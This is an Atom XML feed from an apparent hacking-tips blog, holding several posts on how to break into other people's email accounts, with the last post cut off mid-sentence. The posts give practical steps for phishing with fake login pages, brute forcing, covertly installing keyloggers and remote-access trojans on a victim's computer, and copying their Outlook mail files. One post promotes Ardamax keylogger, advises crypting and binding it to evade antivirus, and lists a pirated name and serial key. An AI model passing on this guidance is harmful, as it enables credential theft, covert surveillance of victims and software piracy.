<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss'><id>tag:blogger.com,1999:blog-7452296460835263490</id><updated>2010-02-19T18:55:51.570-08:00</updated><title type='text'>Bhau Ka Dimag</title><subtitle type='html'>Faq,Questions,Tricks,Tips For Free</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://bhaukadimag.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default'/><link rel='alternate' type='text/html' href='http://bhaukadimag.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default?start-index=26&amp;max-results=25'/><author><name>Akshay</name><uri>http://www.blogger.com/profile/16873342237628129989</uri><email>noreply@blogger.com</email></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>38</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-7452296460835263490.post-7554186144947179537</id><published>2010-01-31T07:12:00.001-08:00</published><updated>2010-01-31T07:12:14.342-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Email hacking'/><title type='text'>How to hack email accounts passwords?</title><content type='html'>&lt;span id="orkut-share" style="border: 1px solid black; cursor: pointer;"&gt; &lt;/span&gt; &lt;br /&gt;&lt;div class="post-body entry-content"&gt; &lt;a href="http://3.bp.blogspot.com/_fMrF3L8CTmg/ScyM1LIsZ4I/AAAAAAAAACE/oUmR2IQb7No/s1600-h/images.jpg"&gt;&lt;img alt="Hack an email account" border="0" id="BLOGGER_PHOTO_ID_5317780105167923074" src="http://3.bp.blogspot.com/_fMrF3L8CTmg/ScyM1LIsZ4I/AAAAAAAAACE/oUmR2IQb7No/s320/images.jpg" style="cursor: pointer; display: block; height: 93px; margin: 0px auto 10px; text-align: center; width: 125px;" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;"How to hack  email accounts  passwords?"&lt;/span&gt; So many people have asked that question,and honestly  its a dumb one.But its our job,to help you,so i made this thread.&lt;br /&gt;There are many ways to &lt;b&gt;hack an email account passwords&lt;/b&gt; but i am  covering here &lt;b&gt;5 &lt;/b&gt;of them:&lt;br /&gt;&lt;a href="" name="more"&gt;&lt;/a&gt;&lt;b&gt;1.&lt;/b&gt;&lt;b&gt;Phishing&lt;/b&gt;&lt;br /&gt;&lt;b&gt;2.&lt;/b&gt;&lt;b&gt;Keylogging&lt;/b&gt;&lt;br /&gt;&lt;b&gt;3.&lt;/b&gt;&lt;b&gt;Brute &lt;span class="IL_AD" id="IL_AD4"&gt;forcing&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;4.&lt;/b&gt;&lt;b&gt;Fake msn&lt;/b&gt;&lt;br /&gt;&lt;b&gt;5.&lt;/b&gt;&lt;b&gt;Guessing the secret question&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="font-size: x-large;"&gt;5 ways to Hack email accounts&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;Phishing:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;This is the most easiest way to &lt;b&gt;hack an email account password&lt;/b&gt; &lt;span class="IL_AD" id="IL_AD2"&gt;Phishing&lt;/span&gt; is a way of saying &lt;span class="IL_AD" id="IL_AD6"&gt;keylogger&lt;/span&gt; but in an other meaning.Let’s  say you want to create a hotmail phishing &lt;a href="" id="AdBriteInlineAd_page" name="AdBriteInlineAd_page" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;page&lt;/a&gt;.The page should look&lt;br /&gt;exactly like the real one.&lt;br /&gt;How does it work:&lt;br /&gt;&lt;br /&gt;You can download/make a &lt;span class="IL_AD" id="IL_AD5"&gt;replica&lt;/span&gt;  of the website you want to phish.And save is as HTML.When you’re done  with that,you have to find a way&lt;br /&gt;to upload the HTML.Best way is a Website.Like Piczo/Blogspot.When thats  done the user types his/hers username and password.And automatically&lt;br /&gt;it will be sent to you by mail.And there you have it,that’s Phishing.&lt;br /&gt;&lt;br /&gt;For more information on see&amp;nbsp; &lt;a href="" id="AdBriteInlineAd_post" name="AdBriteInlineAd_post" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;post&lt;/a&gt;&amp;nbsp; &lt;a href="http://rafayhackingarticles.blogspot.com/2009/07/how-to-create-fake-login-page-for-any.html"&gt;&lt;span style="color: #3d85c6;"&gt;&lt;b&gt;How to create fake login page for  any site&lt;/b&gt;&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;Brute Forcing&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;b&gt;Brute Forcing &lt;/b&gt;is like guessing the password  but instead you  make/download a password list[a long txt file containing words that  might be&lt;br /&gt;the password] ad the Brute Forcer tries them all&lt;br /&gt;Download your &lt;b&gt;&lt;a href="http://www.speedyshare.com/228815220.html"&gt;Msn  Brute Forcer Here:&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;&lt;span style="color: #0066cc;"&gt;&amp;nbsp;[may find a trojan inside but  that's normal]&lt;/span&gt; &lt;br /&gt;&lt;br /&gt;&lt;div style="color: #3d85c6;"&gt;&lt;a href="http://www.hackforums.net/showthread.php?tid=15562"&gt;&lt;b&gt;Download  Password Lists here:&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;span style="color: red;"&gt;&lt;a href="http://www.hackforums.net/showthread.php?tid=15562"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;Keyloggers&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;With keylogger you can easily &lt;b&gt;hack an email account&lt;/b&gt;.Keyloggers is  like phishing but is more simple.Its a simple .exe executable.When  someone clicks it,the Keylogger auto downloads.And you’ll&lt;br /&gt;have ,on your computer,you &lt;a href="" id="AdBriteInlineAd_start" name="AdBriteInlineAd_start" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;start&lt;/a&gt; it,and put in the ip  of the destination,and every hour you’ll receive keys pressed on his  computer&lt;br /&gt;thats an easy way to find out msn passwords&lt;br /&gt;I have a post to Hack any account using aradamax keylogger you can see  it in my new &lt;b&gt;&lt;a href="http://rafayhackingarticles.blogspot.com/2009/03/hack-email-account.html" style="color: #3d85c6;"&gt;KEylogger to hack password:aradamax  keylogger&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;Fake Msn&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;Fake msn is just a replica of Msn Messenger.Let some of your friends  come over.And open up the fake msn.Let them type in ther&lt;br /&gt;&lt;span class="IL_AD" id="IL_AD7"&gt;msn hotmail&lt;/span&gt;,and their  password.Then they will get a troubleshoot , and their username/password  will be saved in a .txt file in C:\&lt;br /&gt;&lt;div style="color: #3d85c6;"&gt;&lt;a href="http://rapidlibrary.com/index.php?q=fake+msn&amp;amp;filetype=0"&gt;&lt;b&gt;Download  here&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;Guessing The Secret Question &lt;/b&gt;&lt;/span&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;If you know your friends,this will be an easy task.Go to &lt;b&gt;http://www.hotmail.com&lt;/b&gt;  and &lt;a href="" id="AdBriteInlineAd_click" name="AdBriteInlineAd_click" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;click&lt;/a&gt; forgot password,then  put in the &lt;a href="" id="AdBriteInlineAd_email" name="AdBriteInlineAd_email" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;email&lt;/a&gt; address&lt;br /&gt;and then the CATCHA code,reply on the secret question,but beware because  you have like 3 tries only.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Warning:This post "How to Hack email accounts" is is truly for  educational purposes&lt;/b&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7452296460835263490-7554186144947179537?l=bhaukadimag.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bhaukadimag.blogspot.com/feeds/7554186144947179537/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/how-to-hack-email-accounts-passwords.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/7554186144947179537'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/7554186144947179537'/><link rel='alternate' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/how-to-hack-email-accounts-passwords.html' title='How to hack email accounts passwords?'/><author><name>Akshay</name><uri>http://www.blogger.com/profile/16873342237628129989</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='16479660345720215528'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_fMrF3L8CTmg/ScyM1LIsZ4I/AAAAAAAAACE/oUmR2IQb7No/s72-c/images.jpg' height='72' width='72'/><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7452296460835263490.post-2994653582793117886</id><published>2010-01-31T07:11:00.001-08:00</published><updated>2010-01-31T07:11:37.735-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Email hacking'/><title type='text'>Hack an account using keylogger:</title><content type='html'>Today, with the advent of a program called Keylogger it’s just a  cakewalk to hack an account. It doesn’t &lt;span class="IL_AD" id="IL_AD7"&gt;matter&lt;/span&gt;  whether or not you have physical access to the victim’s computer. Using  a keylogger is the easiest way to hack an  account. Any one with a  basic knowledge of computer can use the keylogger and within few hours  you can hack any account.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;What is a keylogger? &lt;/strong&gt;&lt;br /&gt;A keylogger, sometimes called a keystroke logger, keylogger, or system  monitor, is a hardware device or small program that monitors each  keystroke a user types on a specific computer’s keyboard. Keylogger is  the easiest way to &lt;b&gt;hack an account &lt;/b&gt;if you have physical access to  victim’s computer. &lt;br /&gt;&lt;br /&gt;A keylogger program can be installed just in a few seconds and once  installed you are only a &lt;span class="IL_AD" id="IL_AD3"&gt;step away&lt;/span&gt;  from getting the victim’s password&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;h1&gt;Hack an account using keylogger:&lt;/h1&gt;&lt;br /&gt;&lt;b&gt;NOTE:-YOU NEED TO HAVE ACCESS TO THE VICTIM'S COMPUTER TO DO THIS:&lt;/b&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;br /&gt;If you have physical access to &lt;span class="IL_AD" id="IL_AD5"&gt;the  computer&lt;/span&gt; of the user that you are targeting, because it is a lot  easier if you do. One option you have, that you will hear a lot if you  ask this question, and anybody bothers to answer is to use a keylogger. A  keylogger is an excellent option, and probably the easiest. There are a  lot of keyloggers out there, ranging from &lt;strong&gt;hardware keyloggers&lt;/strong&gt;,  to &lt;strong&gt;software keyloggers&lt;/strong&gt;. For this task, you won't need  to buy a hardware keylogger, since the only advantage to a hardware one  is that you can grab passwords that are given to access a certain local  user on the operating system used. There are a lot of &lt;a href="" id="AdBriteInlineAd_software" name="AdBriteInlineAd_software" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;software&lt;/a&gt; keyloggers out  there, and you can feel free to check out www.google.com to look at your  options. I will go ahead and toss a couple of keyloggers out to try for  those of you who seem allergic to search &lt;span class="IL_AD" id="IL_AD6"&gt;engines&lt;/span&gt;. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;One option you have that is &lt;a href="" id="AdBriteInlineAd_good" name="AdBriteInlineAd_good" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;good&lt;/a&gt; for a free keylogger is  Perfect Keylogger (which you can find at  www.blazingtools.com/bpk.html). It works just fine, and has some nice  options to keep it hidden from your average end user (computer user). &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Another option you have, which is probably the best one you can get is &lt;strong&gt;Ghost  Keylogger&lt;/strong&gt;. It has a lot of options that will allow you to get  the results of this program remotely (it will email you the results).  However, this is not a free keylogger, so if you are wanting to get a  copy you can look on the file sharing &lt;a href="" id="AdBriteInlineAd_networks" name="AdBriteInlineAd_networks" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;networks&lt;/a&gt; for a copy of  the program, and the serial number for it (look on www.zeropaid.com for  different file sharing clients you can try). &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Once you have whatever keylogger you are going to use downloaded, just  install it onto the computer you are wanting to monitor, and wait till  next time they login to their email account. You will then have the  password for the account. Another option you have if they use Outlook to  access their email account, is to copy the *.dbx files for their  Outlook account onto a floppy, and extract the emails at home (the dbx  file stores the files stored in each Outlook folder on a given account,  meaning the received and sent emails). When you are on the computer of  the user you are targeting, look in&lt;br /&gt;&lt;br /&gt;C:\Windows\ApplicationData\Identities\{ACblahblahblah}\Microsoft\  OutlookExpress\ and copy all the .dbx files onto a floppy. Then when you  take the .dbx files back to your house, use DBXtract to extract the  messages from these files. Check out the link below to download this  program....&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;www.download-freeware-shareware.com/Freeware-Internet.php?Type=4171&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Another option you have if you have physical access is to execute a RAT  (Remote Administration Tool, you may know these programs as trojans)  server on the computer. Of course, you do not have to have physical  access to go this route, but it helps. What you must understand is that  these &lt;a href="" id="AdBriteInlineAd_tools" name="AdBriteInlineAd_tools" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;tools&lt;/a&gt; are known threats,  and the popular ones are quickly detected by &lt;span class="IL_AD" id="IL_AD1"&gt;antivirus software&lt;/span&gt;, and thusly taken care of. Even  ISPs block incoming/outgoing traffic from the most popular ports used by  these programs.&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7452296460835263490-2994653582793117886?l=bhaukadimag.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bhaukadimag.blogspot.com/feeds/2994653582793117886/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/hack-account-using-keylogger.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/2994653582793117886'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/2994653582793117886'/><link rel='alternate' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/hack-account-using-keylogger.html' title='Hack an account using keylogger:'/><author><name>Akshay</name><uri>http://www.blogger.com/profile/16873342237628129989</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='16479660345720215528'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7452296460835263490.post-3952299908562694315</id><published>2010-01-31T07:10:00.002-08:00</published><updated>2010-01-31T07:10:49.055-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Email hacking'/><title type='text'>Ardamax Keylogger</title><content type='html'>&lt;b&gt;Ardamax Keylogger&lt;/b&gt; is a &lt;span class="IL_AD" id="IL_AD6"&gt;keystroke  recorder&lt;/span&gt; that captures user's &lt;span class="IL_AD" id="IL_AD3"&gt;activity&lt;/span&gt;  and saves it to an encrypted &lt;span class="IL_AD" id="IL_AD5"&gt;log file&lt;/span&gt;.This  log file then can be used to hack anyones &lt;span class="IL_AD" id="IL_AD7"&gt;email account&lt;/span&gt; password or any computer password. The  log file can be viewed with the powerful Log Viewer. Ardamax keylogger  is easy to use and install. Use this &lt;a href="" id="AdBriteInlineAd_tool" name="AdBriteInlineAd_tool" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;tool&lt;/a&gt; to find out what is  happening on your computer while you are away, maintain a backup of your  typed data automatically or use it to monitor your kids. Also you can  use it as a monitoring device for detecting unauthorised access or one  can use this tool to hack someones hotmail, gmail, yahoo, msn or other &lt;a href="" id="AdBriteInlineAd_email" name="AdBriteInlineAd_email" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;email&lt;/a&gt; account password.&lt;br /&gt;&lt;br /&gt;&lt;a href="" name="more"&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;img alt="Keylogger to hack" src="http://4.bp.blogspot.com/_GAwTBHF1LrA/R55k9GdTnhI/AAAAAAAAAZY/6On0YH2549g/s320/Ardamax+Keylogger.png" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Ardamax keylogger tutorial&lt;/span&gt;&lt;br /&gt;will help you in installing Ardamax keylogger for hacking passwords.  Remember, ardamax keylogger is detected as hacktool (virus) by most  antivirus. So, dont forget to crypt and bind your keylogger file. If you  have any problem in using Ardamax keylogger to hack email passwords,  please mention it in comments&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;This&lt;b&gt; invisible spy&lt;/b&gt; application is designed for Windows 98, ME,  NT4, 2000, XP and 2003.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Keylogger Features:&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;* &lt;b&gt;Remote Installer&lt;/b&gt; - creates a customized Ardamax Keylogger  engine file. You can email this file to your target for remote  monitoring.&lt;br /&gt;&lt;br /&gt;* &lt;b&gt;Invisible mode&lt;/b&gt; makes it absolutely invisible to anyone. Ardamax  Keylogger is not visible in the task bar, system tray, Windows  98/2000/XP/2003/Vista Task Manager, process viewers (Process Explorer,  WinTasks etc.), &lt;a href="" id="AdBriteInlineAd_Start" name="AdBriteInlineAd_Start" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;Start&lt;/a&gt; Menu and Windows  Startup list.&lt;br /&gt;&lt;br /&gt;* &lt;b&gt;Email log delivery&lt;/b&gt; - keylogger can send you recorded logs  through e-mail delivery at set times - perfect for remote monitoring!&lt;br /&gt;&lt;br /&gt;* &lt;b&gt;FTP delivery&lt;/b&gt; - Ardamax Keylogger can upload recorded logs  through FTP delivery.&lt;br /&gt;&lt;br /&gt;* &lt;b&gt;Network delivery&lt;/b&gt; - sends recorded logs through via LAN.&lt;br /&gt;&lt;br /&gt;* &lt;b&gt;Clipboard logging&lt;/b&gt; - capture all text copied to the Windows  Clipboard.&lt;br /&gt;&lt;br /&gt;* &lt;b&gt;Visual surveillance&lt;/b&gt; - periodically makes screenshots and stores  the compressed images to log.&lt;br /&gt;&lt;br /&gt;* &lt;b&gt;Chat monitoring&lt;/b&gt; - Ardamax Keylogger is designed to record and  monitor both sides of a conversation in following chats:&lt;br /&gt;&lt;b&gt;o&lt;/b&gt;&lt;b&gt; MSN Messenger, Windows Live Messenger&lt;/b&gt;&lt;br /&gt;&lt;b&gt;o ICQ Pro, ICQ Lite&lt;/b&gt;&lt;br /&gt;&lt;b&gt;o Skype&lt;/b&gt;&lt;br /&gt;&lt;b&gt;o Windows Messenger&lt;/b&gt;&lt;br /&gt;&lt;b&gt;o Google Talk&lt;/b&gt;&lt;br /&gt;&lt;b&gt;o Yahoo Messenger&lt;/b&gt;&lt;br /&gt;&lt;b&gt;o Miranda&lt;/b&gt;&lt;br /&gt;&lt;b&gt;o QiP&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;* &lt;b&gt;Security&lt;/b&gt; - allows you to protect program settings, Hidden &lt;a href="" id="AdBriteInlineAd_Mode" name="AdBriteInlineAd_Mode" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;Mode&lt;/a&gt; and Log file.&lt;br /&gt;&lt;br /&gt;* &lt;b&gt;Web Update&lt;/b&gt; - Ardamax Keylogger can check the &lt;span class="IL_AD" id="IL_AD4"&gt;availability&lt;/span&gt; of updates, download and  install them automatically. Thus, the latest version of Ardamax  Keylogger will always be installed on your computer.&lt;br /&gt;&lt;br /&gt;*&lt;b&gt; Application monitoring &lt;/b&gt;- keylogger will record the application  that was in use that received the keystroke!&lt;br /&gt;&lt;br /&gt;* &lt;b&gt;Time/Date tracking&lt;/b&gt; - it allows you to pinpoint the exact time a  window received a keystroke!&lt;br /&gt;&lt;br /&gt;*&lt;b&gt; Powerful Log Viewer&lt;/b&gt; - you can view and save the log as a HTML &lt;a href="" id="AdBriteInlineAd_page" name="AdBriteInlineAd_page" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;page&lt;/a&gt; or plain text with  keylogger Log Viewer.&lt;br /&gt;&lt;br /&gt;*&lt;b&gt; Small size&lt;/b&gt; – Ardamax Keylogger is several times smaller than  other programs with the same features. It has no additional modules and  libraries, so its size is smaller and the performance is higher.&lt;br /&gt;&lt;br /&gt;* Ardamax Keylogger fully supports Unicode characters which makes it  possible to record keystrokes that include characters from Japanese,  Chinese, Arabic and many other character sets.&lt;br /&gt;&lt;br /&gt;* It records every keystroke. Captures passwords and all other invisible  text.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Other Features:&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;* Windows 2000/XP/Vista support&lt;br /&gt;* Monitors multi-user machines&lt;br /&gt;* Automatic startup&lt;br /&gt;* Friendly interface&lt;br /&gt;* Easy to install&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Download:&lt;/b&gt;&lt;br /&gt;&lt;a href="http://www.blogger.com/%20http://www.ziddu.com/download/8149782/ARDAMAX.rar.html" linkindex="108"&gt;&lt;span style="color: #3d85c6;"&gt;&lt;b&gt;updated  version of Aradamax keylogger&lt;/b&gt;&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;b&gt;Password:rafayhackingarticles.blogspot.com&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;&lt;b&gt;[Note, This is the Setup.exe from their  site...I just found a working Name/Key so you can have the full version]&lt;/b&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #ff6600;"&gt;&lt;span style="color: black;"&gt;&lt;b&gt;Code:&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #ff6600;"&gt;&lt;b&gt;Name: nGen 2oo6&lt;br /&gt;&lt;/b&gt; &lt;/span&gt;&lt;b&gt; &lt;/b&gt;&lt;br /&gt;&lt;span style="color: #ff6600;"&gt;&lt;b&gt;Key: RTHUUGQVAWDFOQT&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;I have produced a &lt;a href="" id="AdBriteInlineAd_post" name="AdBriteInlineAd_post" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;post&lt;/a&gt; to &lt;b&gt;&lt;a href="http://www.blogger.com/goog_1255429286566" linkindex="109"&gt;&lt;span style="color: #3d85c6;"&gt;I&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;b&gt;&lt;a href="http://rafayhackingarticles.blogspot.com/2009/09/how-to-install-keylogger-remotely.html" linkindex="110"&gt;&lt;span style="color: #3d85c6;"&gt;nstall a  keylogger remotely&lt;/span&gt;&lt;/a&gt;&lt;/b&gt; which will help you&amp;nbsp;alot.&lt;br /&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif; font-size: 18px; font-weight: bold;"&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;h1 style="background-color: transparent; border-width: 0px; font-size: 19px; font-weight: bold; margin: 5px 0px; outline-width: 0px; padding: 0px;"&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif; font-size: 18px; font-weight: bold;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/h1&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif; font-size: 18px; font-weight: bold;"&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7452296460835263490-3952299908562694315?l=bhaukadimag.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bhaukadimag.blogspot.com/feeds/3952299908562694315/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/ardamax-keylogger.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/3952299908562694315'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/3952299908562694315'/><link rel='alternate' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/ardamax-keylogger.html' title='Ardamax Keylogger'/><author><name>Akshay</name><uri>http://www.blogger.com/profile/16873342237628129989</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='16479660345720215528'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_GAwTBHF1LrA/R55k9GdTnhI/AAAAAAAAAZY/6On0YH2549g/s72-c/Ardamax+Keylogger.png' height='72' width='72'/><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7452296460835263490.post-4515623353221579803</id><published>2010-01-31T07:10:00.000-08:00</published><updated>2010-01-31T07:10:04.043-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Email hacking'/><title type='text'>How to hack into an email account</title><content type='html'>Well one of the question which is asked most to me is,"&lt;strong&gt;How to  hack into an email account&lt;/strong&gt;",So today i am posting a new way to &lt;strong&gt;hack  into an email account&lt;/strong&gt;,I am not posting this &lt;a href="" id="AdBriteInlineAd_post" name="AdBriteInlineAd_post" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;post&lt;/a&gt; to exite hackers but to  make you aware of whats going around&lt;br 